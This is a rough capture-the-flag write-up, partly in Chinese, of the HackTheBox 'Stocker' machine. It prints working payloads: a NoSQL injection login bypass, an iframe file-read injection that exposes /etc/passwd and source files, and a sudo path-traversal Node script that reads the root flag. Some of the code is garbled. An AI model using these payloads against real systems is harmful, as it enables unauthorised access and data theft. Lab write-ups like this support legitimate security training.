10.10.11.196
信息搜集 start infoscan10 .10 .11 .196 is alive[*] Icmp alive hosts len is: 1 10.10.11.196:80 open10.10.11.196:22 open[*] alive ports len is: 2
echo “10.10.11.196 stocker.htb” >> /etc/hosts
wpscan –url http://stocker.htb/
./gobuster.shhttp://stocker.htb/img (Status: 301) [Size: 178] [–> http://stocker.htb/img/] http://stocker.htb/css (Status: 301) [Size: 178] [–> http://stocker.htb/css/] http://stocker.htb/js (Status: 301) [Size: 178] [–> http://stocker.htb/js/] http://stocker.htb/fonts (Status: 301) [Size: 178] [–> http://stocker.htb/fonts/]
gobuster vhost --url http://stocker.htb/ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 100
echo "10.10.11.196 dev.stocker.htb" >> /etc/hosts
info nginx/1.18.0 (Ubuntu)
http://dev.stocker.htb
getshell Nosql inject
burp repeater
GET /login HTTP/1.1 Host : dev.stocker.htbUser-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateConnection : closeCookie : connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWkUpgrade-Insecure-Requests : 1Referer : http://dev.stocker.htb/stockContent-Length : 57{"username" : {"$ne " : null }, "password" : {"$ne " : null } }
burp repeater 2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 POST /api/order HTTP/1.1 Host : dev.stocker.htbUser-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateConnection : closeCookie : connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWkUpgrade-Insecure-Requests : 1Content-Type : application/jsonContent-Length : 370{ "basket" :[ { "_id" :"638f116eeb060210cbd83a8f" , "title" :"<iframe src=file:///etc/passwd height=750px width=750px</iframe>" , "description" :"It's a rubbish bin." , "image" :"bin.jpg" , "price" :76 , "currentStock" :15 , "__v" :0 , "amount" :1 } ] } and response HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu)Date: Fri, 16 Jun 2023 14 :12 :45 GMTContent-Type: application/json ; charset = utf-8 Content-Length: 53 Connection: closeX-Powered-By: ExpressETag: W/ "35-wdJz8BSxG+QfgESwzE+FGjqXwXk" {"success" :true ,"orderId" :"648c6dddb1b0836ceb84025a" } http://dev.stocker.htb/api/po/648c6dddb1b0836ceb84025a it should be Items which you buy, but it give you /etc/passwd content. so we could also get content of / var/ www/ dev/ index.js
Once you get index.js, we found the password, and try ssh to connect.
ssh angoose@10.10.11.196
sudo提权 sudo -l
[sudo] password for angoose: Matching Defaults entries for angoose on stocker: :/usr/local/bin \:/usr/sbin \:/usr/bin \:/sbin \:/bin \:/snap/bin User angoose may run the following commands on stocker: ALL ) /usr/bin/node /usr/local/scripts/*.js
cp root-flag.js /usr/local/scripts/
/usr/local/scripts
sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/root-flag.js
root-flag.js
const fs = require ('fs' );readFile ('/root/root.txt' , 'utf8' , (err, data ) => {if (err) throw err;console .log (data);
conclusion 1. what is VHOST enumeration mode? 它的原理是什么,为什么能枚举出子域名? https://github.com/EdgeSecurityTeam/EHole/releases/download/v3.1/EHole_linux_amd64.zip ./EHole_linux_amd64 finger -u http://dev.stocker.htb/login -l finger.json
3. filezilla installed faster file transfer
4. sudo -l sudo -l
User angoose may run the following commands on stocker:
reference